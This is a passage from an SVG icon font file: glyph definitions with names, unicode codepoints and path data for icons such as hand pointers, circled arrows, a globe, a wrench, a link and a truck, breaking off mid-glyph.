    <glyph glyph-name="hand-point-up" unicode="&#xf0a6;" horiz-adv-x="384" 
d="M135.652 448c23.625 0 43.8252 -20.6504 43.8252 -44.7998v-99.8516c17.0488 16.3408 49.7666 18.3467 70.9443 -6.29883c22.8291 14.2881 53.0176 2.14746 62.3154 -16.4502c49.1406 8.97461 71.2627 -21.9453 71.2627 -72.5996
c0 -2.74609 -0.203125 -13.2764 -0.195312 -16c0.167969 -61.9707 -31.0645 -76.8936 -38.3145 -123.731c-1.80762 -11.6729 -11.8916 -20.2686 -23.7041 -20.2686h-171.525l-0.000976562 0.00195312c-18.3662 0.0107422 -35.8887 10.6074 -43.8447 28.4639
c-12.9941 28.8857 -49.0381 95.4121 -77.3232 107.534c-18.1943 7.79688 -29.084 21.3838 -29.0918 40c-0.0136719 34.2217 35.0977 57.752 66.9082 44.1191c8.3584 -3.58301 16.6699 -8.3125 24.918 -14.1533v149.234c0 23.4502 20.543 44.7998 43.8262 44.7998zM136 32
h192c13.2549 0 24 -10.7451 24 -24v-48c0 -13.2549 -10.7451 -24 -24 -24h-192c-13.2549 0 -24 10.7451 -24 24v48c0 13.2549 10.7451 24 24 24zM304 4c-11.0459 0 -20 -8.9541 -20 -20s8.9541 -20 20 -20s20 8.9541 20 20s-8.9541 20 -20 20z" />
    <glyph glyph-name="hand-point-down" unicode="&#xf0a7;" horiz-adv-x="384" 
d="M91.8262 -19.2002v149.234c-8.24805 -5.84082 -16.5586 -10.5703 -24.918 -14.1533c-31.8105 -13.6328 -66.9219 9.89746 -66.9082 44.1191c0.0078125 18.6162 10.8975 32.2031 29.0918 40c28.2861 12.1221 64.3291 78.6484 77.3232 107.534
c7.95605 17.8564 25.4785 28.4531 43.8447 28.4639l0.000976562 0.00195312h171.526c11.8115 0 21.8965 -8.5957 23.7031 -20.2686c7.25 -46.8379 38.4824 -61.7607 38.3145 -123.731c-0.00683594 -2.72363 0.195312 -13.2539 0.195312 -16
c0 -50.6543 -22.1221 -81.5742 -71.2627 -72.5996c-9.29688 -18.5977 -39.4863 -30.7383 -62.3154 -16.4502c-21.1768 -24.6455 -53.8955 -22.6396 -70.9443 -6.29883v-99.8516c0 -24.1494 -20.2002 -44.7998 -43.8252 -44.7998
c-23.2832 0 -43.8262 21.3496 -43.8262 44.7998zM112 376v48c0 13.2549 10.7451 24 24 24h192c13.2549 0 24 -10.7451 24 -24v-48c0 -13.2549 -10.7451 -24 -24 -24h-192c-13.2549 0 -24 10.7451 -24 24zM324 400c0 11.0459 -8.9541 20 -20 20s-20 -8.9541 -20 -20
s8.9541 -20 20 -20s20 8.9541 20 20z" />
    <glyph glyph-name="arrow-circle-left" unicode="&#xf0a8;" 
d="M256 -56c-137 0 -248 111 -248 248s111 248 248 248s248 -111 248 -248s-111 -248 -248 -248zM284.9 87.5996l-75.5 72.4004h182.6c13.2998 0 24 10.7002 24 24v16c0 13.2998 -10.7002 24 -24 24h-182.6l75.5 72.4004c9.69922 9.2998 9.89941 24.7998 0.399414 34.2998
l-11 10.8994c-9.39941 9.40039 -24.5996 9.40039 -33.8994 0l-132.7 -132.6c-9.40039 -9.40039 -9.40039 -24.5996 0 -33.9004l132.7 -132.699c9.39941 -9.40039 24.5996 -9.40039 33.8994 0l11 10.8994c9.5 9.5 9.2998 25 -0.399414 34.2998z" />
    <glyph glyph-name="arrow-circle-right" unicode="&#xf0a9;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM227.1 296.4l75.5 -72.4004h-182.6c-13.2998 0 -24 -10.7002 -24 -24v-16c0 -13.2998 10.7002 -24 24 -24h182.6l-75.5 -72.4004
c-9.69922 -9.2998 -9.89941 -24.7998 -0.399414 -34.2998l11 -10.8994c9.39941 -9.40039 24.5996 -9.40039 33.8994 0l132.7 132.6c9.40039 9.40039 9.40039 24.5996 0 33.9004l-132.7 132.8c-9.39941 9.39941 -24.5996 9.39941 -33.8994 0l-11 -10.9004
c-9.5 -9.59961 -9.2998 -25.0996 0.399414 -34.3994z" />
    <glyph glyph-name="arrow-circle-up" unicode="&#xf0aa;" 
d="M8 192c0 137 111 248 248 248s248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248zM151.6 163.1l72.4004 75.5v-182.6c0 -13.2998 10.7002 -24 24 -24h16c13.2998 0 24 10.7002 24 24v182.6l72.4004 -75.5c9.2998 -9.69922 24.7998 -9.89941 34.2998 -0.399414
l10.8994 11c9.40039 9.39941 9.40039 24.5996 0 33.8994l-132.6 132.7c-9.40039 9.40039 -24.5996 9.40039 -33.9004 0l-132.8 -132.7c-9.39941 -9.39941 -9.39941 -24.5996 0 -33.8994l10.9004 -11c9.59961 -9.5 25.0996 -9.2998 34.3994 0.399414z" />
    <glyph glyph-name="arrow-circle-down" unicode="&#xf0ab;" 
d="M504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM360.4 220.9l-72.4004 -75.5v182.6c0 13.2998 -10.7002 24 -24 24h-16c-13.2998 0 -24 -10.7002 -24 -24v-182.6l-72.4004 75.5
c-9.2998 9.69922 -24.7998 9.89941 -34.2998 0.399414l-10.8994 -11c-9.40039 -9.39941 -9.40039 -24.5996 0 -33.8994l132.6 -132.7c9.40039 -9.40039 24.5996 -9.40039 33.9004 0l132.699 132.7c9.40039 9.39941 9.40039 24.5996 0 33.8994l-10.8994 11
c-9.5 9.5 -25 9.2998 -34.2998 -0.399414z" />
    <glyph glyph-name="globe" unicode="&#xf0ac;" horiz-adv-x="495" 
d="M336.5 288h-177c14.5 89.2998 48.7002 152 88.5 152s74 -62.7002 88.5 -152zM152 192c0 22.2002 1.2002 43.5 3.2998 64h185.3c2.10059 -20.5 3.30078 -41.7998 3.30078 -64s-1.2002 -43.5 -3.30078 -64h-185.3c-2.09961 20.5 -3.2998 41.7998 -3.2998 64zM476.7 288
h-108c-8.7998 56.9004 -25.6006 107.8 -50 141.6c71.5 -21.1992 129.399 -73.6992 158 -141.6zM177.2 429.6c-24.4004 -33.7998 -41.2002 -84.6992 -49.9004 -141.6h-108c28.5 67.9004 86.5 120.4 157.9 141.6zM487.4 256c5.39941 -20.5 8.5 -41.7998 8.5 -64
s-3.10059 -43.5 -8.60059 -64h-114.6c2.09961 21 3.2998 42.5 3.2998 64s-1.2002 43 -3.2998 64h114.7zM120 192c0 -21.5 1.2002 -43 3.2002 -64h-114.601c-5.39941 20.5 -8.59961 41.7998 -8.59961 64s3.2002 43.5 8.59961 64h114.7
c-2.09961 -21 -3.2998 -42.5 -3.2998 -64zM159.5 96h177c-14.5 -89.2998 -48.7002 -152 -88.5 -152s-74 62.7002 -88.5 152zM318.8 -45.5996c24.4004 33.7998 41.2002 84.6992 50 141.6h108c-28.5996 -67.9004 -86.5996 -120.4 -158 -141.6zM19.2998 96h108
c8.7998 -56.9004 25.6006 -107.8 50 -141.6c-71.5 21.1992 -129.399 73.6992 -158 141.6z" />
    <glyph glyph-name="wrench" unicode="&#xf0ad;" 
d="M507.73 338.9c11.7891 -47.4102 -0.84082 -99.6602 -37.9102 -136.73c-39.9004 -39.9004 -97.25 -50.9297 -147.37 -34.2197l-213.21 -213.21c-24.9902 -24.9902 -65.5098 -24.9902 -90.5 0s-24.9902 65.5098 0 90.5l213.39 213.39
c-16.5 50.1006 -5.58984 107.561 34.0498 147.2c37.0303 37.0195 89.2002 49.6699 136.58 37.9297c9.08984 -2.25977 12.2803 -13.54 5.66016 -20.1602l-74.3604 -74.3594l11.3105 -67.8799l67.8799 -11.3105l74.3604 74.3604
c6.58008 6.58008 17.8799 3.51953 20.1201 -5.50977zM64 -24c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24z" />
    <glyph glyph-name="tasks" unicode="&#xf0ae;" 
d="M208 316c-8.7998 0 -16 7.2002 -16 16v40c0 8.7998 7.2002 16 16 16h288c8.7998 0 16 -7.2002 16 -16v-40c0 -8.7998 -7.2002 -16 -16 -16h-288zM208 156c-8.7998 0 -16 7.2002 -16 16v40c0 8.7998 7.2002 16 16 16h288c8.7998 0 16 -7.2002 16 -16v-40
c0 -8.7998 -7.2002 -16 -16 -16h-288zM208 -4c-8.7998 0 -16 7.2002 -16 16v40c0 8.7998 7.2002 16 16 16h288c8.7998 0 16 -7.2002 16 -16v-40c0 -8.7998 -7.2002 -16 -16 -16h-288zM64 80c26.5 0 48 -21.5 48 -48s-21.5 -48 -48 -48s-48.5996 21.5 -48.5996 48
s22.0996 48 48.5996 48zM156.5 379l-72.2002 -72.2002l-15.5996 -15.5996c-4.7002 -4.7002 -12.9004 -4.7002 -17.6006 0l-47.5996 47.3994c-4.7002 4.7002 -4.7002 12.3008 0 17l15.7002 15.7002c4.7002 4.7002 12.2998 4.7002 17 0l22.7002 -22.0996l63.6992 63.2998
c4.7002 4.7002 12.3008 4.7002 17 0l17 -16.5c4.60059 -4.7002 4.60059 -12.2998 -0.0996094 -17zM156.5 219.4l-72.2002 -72.2002l-15.7002 -15.7002c-4.69922 -4.7002 -12.8994 -4.7002 -17.5996 0l-47.5 47.5c-4.7002 4.7002 -4.7002 12.2998 0 17l15.7002 15.7002
c4.7002 4.7002 12.2998 4.7002 17 0l22.7002 -22.1006l63.6992 63.7002c4.7002 4.7002 12.3008 4.7002 17 0l17 -17c4.60059 -4.59961 4.60059 -12.2002 -0.0996094 -16.8994z" />
    <glyph glyph-name="filter" unicode="&#xf0b0;" 
d="M487.976 448c21.3623 0 32.0459 -25.8965 16.9717 -40.9707l-184.947 -184.971v-262.039c0 -19.5127 -21.9805 -30.71 -37.7627 -19.6611l-80 55.9795c-6.41602 4.49219 -10.2373 11.8311 -10.2373 19.6621v206.059l-184.942 184.971
c-15.1045 15.1045 -4.34766 40.9707 16.9707 40.9707h463.947z" />
    <glyph glyph-name="briefcase" unicode="&#xf0b1;" 
d="M320 112v48h192v-144c0 -25.5996 -22.4004 -48 -48 -48h-416c-25.5996 0 -48 22.4004 -48 48v144h192v-48c0 -8.83984 7.16016 -16 16 -16h96c8.83984 0 16 7.16016 16 16zM464 320c25.5996 0 48 -22.4004 48 -48v-80h-512v80c0 25.5996 22.4004 48 48 48h80v48
c0 25.5996 22.4004 48 48 48h160c25.5996 0 48 -22.4004 48 -48v-48h80zM320 320v32h-128v-32h128z" />
    <glyph glyph-name="arrows-alt" unicode="&#xf0b2;" horiz-adv-x="511" 
d="M352.201 22.2246l-79.1963 -79.1953c-9.37305 -9.37305 -24.5684 -9.37305 -33.9404 0l-79.1963 79.1953c-15.1191 15.1191 -4.41113 40.9717 16.9707 40.9707h51.1621l-0.000976562 100.805h-100.804v-51.1621c0 -21.3818 -25.8516 -32.0898 -40.9717 -16.9707
l-79.1953 79.1963c-9.37305 9.37207 -9.37305 24.5684 0 33.9404l79.1953 79.1963c15.1191 15.1191 40.9717 4.41113 40.9717 -16.9717v-51.2285h100.804v100.804h-51.2305c-21.3818 0 -32.0898 25.8516 -16.9707 40.9717l79.1963 79.1953
c9.37305 9.37305 24.5684 9.37305 33.9404 0l79.1963 -79.1953c15.1191 -15.1191 4.41113 -40.9717 -16.9707 -40.9717h-51.1621v-100.804h100.804v51.1621c0 21.3818 25.8516 32.0898 40.9707 16.9707l79.1953 -79.1963c9.37305 -9.37207 9.37305 -24.5684 0 -33.9404
l-79.1953 -79.1963c-15.1191 -15.1191 -40.9717 -4.41113 -40.9707 16.9717v51.2285h-100.803v-100.804h51.2305c21.3818 0 32.0898 -25.8516 16.9707 -40.9717z" />
    <glyph glyph-name="users" unicode="&#xf0c0;" horiz-adv-x="640" 
d="M96 224c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64zM544 224c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64zM576 192c35.2998 0 64 -28.7002 64 -64v-32
c0 -17.7002 -14.2998 -32 -32 -32h-66c-6.2002 47.4004 -34.7998 87.2998 -75.0996 109.4c11.5996 11.5 27.5 18.5996 45.0996 18.5996h64zM320 192c-61.9004 0 -112 50.0996 -112 112s50.0996 112 112 112s112 -50.0996 112 -112s-50.0996 -112 -112 -112zM396.8 160
c63.6006 0 115.2 -51.5996 115.2 -115.2v-28.7998c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v28.7998c0 63.6006 51.5996 115.2 115.2 115.2h8.2998c20.9004 -10 43.9004 -16 68.5 -16s47.7002 6 68.5 16h8.2998zM173.1 173.4
c-40.2998 -22.1006 -68.8994 -62 -75.1992 -109.4h-65.9004c-17.7002 0 -32 14.2998 -32 32v32c0 35.2998 28.7002 64 64 64h64c17.5996 0 33.5 -7.09961 45.0996 -18.5996z" />
    <glyph glyph-name="link" unicode="&#xf0c1;" 
d="M326.612 262.609c59.7471 -59.8096 58.9268 -155.698 0.359375 -214.591c-0.109375 -0.119141 -0.239258 -0.25 -0.359375 -0.369141l-67.2002 -67.2002c-59.2705 -59.2705 -155.699 -59.2627 -214.96 0c-59.2705 59.2598 -59.2705 155.7 0 214.96l37.1055 37.1055
c9.84082 9.84082 26.7861 3.30078 27.2939 -10.6055c0.648438 -17.7227 3.82617 -35.5273 9.69043 -52.7207c1.98633 -5.82227 0.567383 -12.2627 -3.7832 -16.6123l-13.0869 -13.0869c-28.0254 -28.0264 -28.9053 -73.6602 -1.15527 -101.96
c28.0244 -28.5791 74.0859 -28.749 102.325 -0.510742l67.2002 67.1904c28.1914 28.1914 28.0732 73.7568 0 101.83c-3.70117 3.69434 -7.42871 6.56348 -10.3408 8.56934c-3.66504 2.51562 -6.77734 8.16309 -6.94727 12.6055
c-0.395508 10.5674 3.34766 21.4561 11.6982 29.8057l21.0537 21.0557c5.52148 5.52051 14.1826 6.19922 20.584 1.73047c6.08301 -4.24707 15.2764 -11.9512 20.5225 -17.1963zM467.547 403.551c59.2705 -59.2598 59.2705 -155.7 -0.000976562 -214.959l-37.1055 -37.1055
c-9.84082 -9.83984 -26.7852 -3.30078 -27.2939 10.6055c-0.648438 17.7227 -3.82617 35.5273 -9.69043 52.7217c-1.98633 5.82129 -0.567383 12.2617 3.7832 16.6113l13.0869 13.0869c28.0264 28.0264 28.9053 73.6602 1.15527 101.96
c-28.0254 28.5791 -74.0869 28.749 -102.325 0.510742l-67.2002 -67.1904c-28.1914 -28.1914 -28.0732 -73.7568 0 -101.83c3.70117 -3.69434 7.42871 -6.56348 10.3408 -8.56934c3.66504 -2.51562 6.77734 -8.16309 6.94727 -12.6055
c0.395508 -10.5674 -3.34766 -21.4561 -11.6982 -29.8057l-21.0537 -21.0557c-5.52051 -5.51953 -14.1826 -6.19922 -20.584 -1.73047c-6.08203 4.24609 -15.2754 11.9502 -20.5215 17.1953c-59.7471 59.8096 -58.9258 155.698 -0.359375 214.591
c0.109375 0.119141 0.239258 0.25 0.359375 0.369141l67.2002 67.2002c59.2705 59.2705 155.699 59.2627 214.96 0z" />
    <glyph glyph-name="cloud" unicode="&#xf0c2;" horiz-adv-x="640" 
d="M537.6 221.4c58.4004 -11.8008 102.4 -63.5 102.4 -125.4c0 -70.7002 -57.2998 -128 -128 -128h-368c-79.5 0 -144 64.5 -144 144c0 62.7998 40.2002 116.2 96.2002 135.9c-0.100586 2.69922 -0.200195 5.39941 -0.200195 8.09961c0 88.4004 71.5996 160 160 160
c59.2998 0 111 -32.2002 138.7 -80.2002c15.2002 10.2002 33.5996 16.2002 53.2998 16.2002c53 0 96 -43 96 -96c0 -12.2002 -2.2998 -23.9004 -6.40039 -34.5996z" />
    <glyph glyph-name="flask" unicode="&#xf0c3;" horiz-adv-x="448" 
d="M437.2 44.5c29.2998 -47 -4.40039 -108.5 -60.1006 -108.5h-306.199c-55.6006 0 -89.4004 61.4004 -60.1006 108.5l117.2 188.5v151h-8c-13.2998 0 -24 10.7002 -24 24v16c0 13.2998 10.7002 24 24 24h208c13.2998 0 24 -10.7002 24 -24v-16
c0 -13.2998 -10.7002 -24 -24 -24h-8v-151zM137.9 128h172l-48.2002 77.5996c-3.60059 5.2002 -5.7998 11.5 -5.7998 18.4004v160h-64v-160c0 -6.7998 -2.10059 -13.2002 -5.80078 -18.4004z" />
    <glyph glyph-name="cut" unicode="&#xf0c4;" horiz-adv-x="447" 
d="M278.06 192l166.421 -166.43c4.68945 -4.69043 4.68945 -12.29 0 -16.9707c-32.8008 -32.7998 -85.9902 -32.7998 -118.79 0l-115.511 115.521l-24.8594 -24.8604c4.30957 -10.9199 6.67969 -22.8096 6.67969 -35.2598c0 -53.0195 -42.9805 -96 -96 -96
s-96 42.9805 -96 96s42.9805 96 96 96c4.53027 0 8.99023 -0.320312 13.3604 -0.929688l32.9297 32.9297l-32.9297 32.9297c-4.37012 -0.609375 -8.82031 -0.929688 -13.3604 -0.929688c-53.0195 0 -96 42.9805 -96 96s42.9805 96 96 96s96 -42.9805 96 -96
c0 -12.4502 -2.37012 -24.3398 -6.67969 -35.2598l24.8594 -24.8604l115.511 115.521c32.7998 32.7998 85.9893 32.7998 118.79 0c4.68945 -4.68066 4.68945 -12.2803 0 -16.9707zM96 288c17.6396 0 32 14.3604 32 32s-14.3604 32 -32 32s-32 -14.3604 -32 -32
s14.3604 -32 32 -32zM96 32c17.6396 0 32 14.3604 32 32s-14.3604 32 -32 32s-32 -14.3604 -32 -32s14.3604 -32 32 -32z" />
    <glyph glyph-name="copy" unicode="&#xf0c5;" horiz-adv-x="448" 
d="M320 0v-40c0 -13.2549 -10.7451 -24 -24 -24h-272c-13.2549 0 -24 10.7451 -24 24v368c0 13.2549 10.7451 24 24 24h72v-296c0 -30.8789 25.1211 -56 56 -56h168zM320 344c0 -13.2002 10.7998 -24 24 -24h104v-264c0 -13.2549 -10.7451 -24 -24 -24h-272
c-13.2549 0 -24 10.7451 -24 24v368c0 13.2549 10.7451 24 24 24h168v-104zM440.971 375.029c3.87988 -3.88086 7.0293 -11.4834 7.0293 -16.9707v-6.05859h-96v96h6.05859c5.4873 0 13.0898 -3.14941 16.9707 -7.0293z" />
    <glyph glyph-name="paperclip" unicode="&#xf0c6;" horiz-adv-x="448" 
d="M43.2461 -18.1416c-58.4297 60.2891 -57.3408 157.511 1.38574 217.581l209.76 214.561c44.3164 45.332 116.352 45.3359 160.672 0c43.8896 -44.8936 43.9424 -117.329 0 -162.276l-182.85 -186.852c-29.8545 -30.5371 -78.6328 -30.1113 -107.981 0.998047
c-28.2754 29.9697 -27.3682 77.4727 1.45117 106.953l143.743 146.835c6.18262 6.31348 16.3125 6.42188 22.626 0.241211l22.8613 -22.3799c6.31445 -6.18164 6.42188 -16.3115 0.241211 -22.626l-143.729 -146.82c-4.93164 -5.04492 -5.23535 -13.4287 -0.647461 -18.292
c4.37207 -4.63379 11.2451 -4.71094 15.6875 -0.165039l182.85 186.851c19.6123 20.0625 19.6123 52.7256 -0.0117188 72.7979c-19.1885 19.627 -49.957 19.6377 -69.1533 0l-209.762 -214.56c-34.7627 -35.5605 -35.2988 -93.1201 -1.19043 -128.313
c34.0098 -35.0928 88.9844 -35.1367 123.058 -0.285156l172.061 175.999c6.17676 6.31836 16.3066 6.43262 22.626 0.255859l22.877 -22.3643c6.31836 -6.17676 6.43359 -16.3066 0.255859 -22.626l-172.061 -175.998c-59.5752 -60.9385 -155.942 -60.2158 -214.77 0.485352
z" />
    <glyph glyph-name="save" unicode="&#xf0c7;" horiz-adv-x="448" 
d="M433.941 318.059c7.75977 -7.75977 14.0586 -22.9658 14.0586 -33.9404v-268.118c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h268.118c10.9746 0 26.1807 -6.29883 33.9404 -14.0586zM224 32
c35.3457 0 64 28.6543 64 64s-28.6543 64 -64 64s-64 -28.6543 -64 -64s28.6543 -64 64 -64zM320 336.52c0 2.74316 -1.5752 6.5459 -3.51465 8.48535l-3.48047 3.48047c-2.25 2.25098 -5.30176 3.51465 -8.48535 3.51465h-228.52c-6.62695 0 -12 -5.37305 -12 -12v-104
c0 -6.62695 5.37305 -12 12 -12h232c6.62695 0 12 5.37305 12 12v100.52z" />
    <glyph glyph-name="square" unicode="&#xf0c8;" horiz-adv-x="448" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352z" />
    <glyph glyph-name="bars" unicode="&#xf0c9;" horiz-adv-x="448" 
d="M16 316c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416zM16 156c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40
c0 -8.83691 -7.16309 -16 -16 -16h-416zM16 -4c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h416c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-416z" />
    <glyph glyph-name="list-ul" unicode="&#xf0ca;" 
d="M96 352c0 -26.5098 -21.4902 -48 -48 -48s-48 21.4902 -48 48s21.4902 48 48 48s48 -21.4902 48 -48zM48 240c26.5098 0 48 -21.4902 48 -48s-21.4902 -48 -48 -48s-48 21.4902 -48 48s21.4902 48 48 48zM48 80c26.5098 0 48 -21.4902 48 -48s-21.4902 -48 -48 -48
s-48 21.4902 -48 48s21.4902 48 48 48zM144 316c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h352c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-352zM144 156c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h352
c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-352zM144 -4c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h352c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-352z" />
    <glyph glyph-name="list-ol" unicode="&#xf0cb;" horiz-adv-x="514" 
d="M3.2627 308.473c0 7.47754 3.91699 11.5723 11.5732 11.5723h15.1309v39.877c0 5.16309 0.53418 10.5029 0.53418 10.5029h-0.356445s-1.77832 -2.66992 -2.84766 -3.73828c-4.45117 -4.27246 -10.5039 -4.4502 -15.666 1.06836l-5.51758 6.23145
c-5.3418 5.34082 -4.98438 11.2158 0.53418 16.3789l21.7197 19.9375c4.44824 4.0957 8.36523 5.69727 14.418 5.69727h12.1045c7.65625 0 11.749 -3.91602 11.749 -11.5723v-84.3838h15.4883c7.65527 0 11.5723 -4.09375 11.5723 -11.5723v-8.90039
c0 -7.47754 -3.91699 -11.5723 -11.5723 -11.5723h-67.291c-7.65625 0 -11.5732 4.09473 -11.5732 11.5723v8.90137zM2.21094 143.409c0 47.2773 50.9551 56.3828 50.9551 69.165c0 7.17969 -5.9541 8.75488 -9.28027 8.75488
c-3.15234 0 -6.47852 -1.05078 -9.45508 -3.85254c-5.0791 -4.90234 -10.5068 -7.00391 -16.1104 -2.4502l-8.5791 6.8291c-5.7793 4.55273 -7.18066 9.80469 -2.80273 15.4082c6.65332 8.75488 19.0869 18.7363 40.4482 18.7363
c19.4375 0 44.4766 -10.5059 44.4766 -39.5732c0 -38.3467 -46.7529 -46.4014 -48.6797 -56.9092h39.0498c7.52832 0 11.5566 -4.02637 11.5566 -11.3818v-8.75488c0 -7.35352 -4.02832 -11.3818 -11.5566 -11.3818h-67.9404c-7.00488 0 -12.083 4.02832 -12.083 11.3818
v4.02832h0.000976562zM5.6543 -6.61035l5.60254 9.28027c3.85352 6.6543 9.10547 7.00391 15.584 3.15234c4.90332 -2.10156 9.62988 -3.15234 14.3594 -3.15234c10.1553 0 14.3574 3.50195 14.3574 8.23047c0 6.65332 -5.60352 9.10547 -15.9336 9.10547h-4.72754
c-5.9541 0 -9.28027 2.10156 -12.2588 7.87988l-1.0498 1.92578c-2.45117 4.72852 -1.22559 9.80664 2.80078 14.8848l5.60449 7.00391c6.8291 8.40527 12.2568 13.4824 12.2568 13.4824v0.350586s-4.20312 -1.05078 -12.6084 -1.05078h-12.957
c-7.5293 0 -11.3828 4.02734 -11.3828 11.3818v8.75488c0 7.53027 3.85352 11.3818 11.3828 11.3818h58.4844c7.5293 0 11.3818 -4.02734 11.3818 -11.3818v-3.32715c0 -5.77832 -1.40039 -9.80566 -5.0791 -14.1826l-17.5088 -20.1377
c19.6113 -5.07812 28.7158 -20.4863 28.7158 -34.8447c0 -21.3633 -14.3574 -44.126 -48.5029 -44.126c-16.6357 0 -28.1914 4.72754 -35.8955 9.45508c-5.7793 4.20215 -6.30469 9.80469 -2.62598 15.9336zM144 316c-8.83691 0 -16 7.16309 -16 16v40
c0 8.83691 7.16309 16 16 16h352c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-352zM144 156c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h352c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-352zM144 -4
c-8.83691 0 -16 7.16309 -16 16v40c0 8.83691 7.16309 16 16 16h352c8.83691 0 16 -7.16309 16 -16v-40c0 -8.83691 -7.16309 -16 -16 -16h-352z" />
    <glyph glyph-name="strikethrough" unicode="&#xf0cc;" 
d="M496 160h-480c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h480c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16zM281.334 144h122.773c6.52441 -14.1826 10.1426 -30.7852 10.1426 -50.5996
c0 -88.9863 -73.4346 -134.425 -162.013 -134.425c-76.7705 0 -154.487 34.9756 -154.487 101.82v19.2041c0 8.83691 7.16406 16 16 16h45.6133c8.83594 0 16 -7.16309 16 -16v-1.64844c0 -32.1904 44.5488 -44.2705 76.874 -44.2705
c46.6436 0 75.6211 20.5684 75.6211 53.6758c0 27.5605 -19.2666 43.3066 -46.5244 56.2432zM250.382 240h-129.823c-8.11133 15.3711 -12.7764 33.8369 -12.7764 56.5469c0 84.6738 65.5225 125.646 150.726 125.646c70.8506 0 142.575 -27.4375 142.575 -79.875v-30.3184
c0 -8.83691 -7.16406 -16 -16 -16h-45.6133c-8.83594 0 -16 7.16309 -16 16v2.10352c0 16.3926 -22.3145 32.9854 -64.9619 32.9854c-34.0605 0 -64.9619 -13.4863 -64.9619 -47.4062c0 -30.7363 24.4141 -46.1777 56.8359 -59.6826z" />
    <glyph glyph-name="underline" unicode="&#xf0cd;" horiz-adv-x="448" 
d="M224.264 59.7598c-91.6689 0 -156.603 51.165 -156.603 151.393v172.848h-28.291c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h137.39c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-28.8125v-172.848
c0 -53.6992 28.3135 -79.4443 76.3164 -79.4443c46.9668 0 75.7959 25.4336 75.7959 79.9648v172.327h-28.291c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h136.868c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-28.291v-172.848
c0 -99.4053 -64.8809 -151.393 -156.082 -151.393zM16 0h416c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-416c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16z" />
    <glyph glyph-name="table" unicode="&#xf0ce;" 
d="M464 416c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h416zM224 32v96h-160v-96h160zM224 192v96h-160v-96h160zM448 32v96h-160v-96h160zM448 192v96h-160v-96h160z" />
    <glyph glyph-name="magic" unicode="&#xf0d0;" 
d="M224 352l-16 32l-32 16l32 16l16 32l16 -32l32 -16l-32 -16zM80 288l-26.6602 53.3301l-53.3398 26.6699l53.3398 26.6699l26.6602 53.3301l26.6602 -53.3301l53.3398 -26.6699l-53.3398 -26.6699zM432 160l26.6602 -53.3301l53.3398 -26.6699l-53.3398 -26.6699
l-26.6602 -53.3301l-26.6602 53.3301l-53.3398 26.6699l53.3398 26.6699zM502.62 353.77c12.5 -12.4893 12.5 -32.7598 0 -45.2393l-363.14 -363.15c-6.25 -6.25 -14.4404 -9.37012 -22.6309 -9.37012c-8.17969 0 -16.3691 3.12012 -22.6191 9.37012l-84.8506 84.8506
c-12.5 12.4893 -12.5 32.75 0 45.25l363.14 363.14c6.25 6.25977 14.4404 9.37988 22.6309 9.37988c8.18945 0 16.3799 -3.12012 22.6191 -9.37988zM359.45 244.54l86.5996 86.5996l-50.9102 50.9102l-86.5996 -86.5996z" />
    <glyph glyph-name="truck" unicode="&#xf0d1;" horiz-adv-x="640" 
d="M624 96c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-48c0 -53 -43 -96 -96 -96s-96 43 -96 96h-128c0 -53 -43 -96 -96 -96s-96 43 -96 96h-16c-26.5 0 -48 21.5 -48 48v320c0 26.5 21.5 48 48 48h320c26.5 0 48 -21.5 48 -48v-48h44.0996
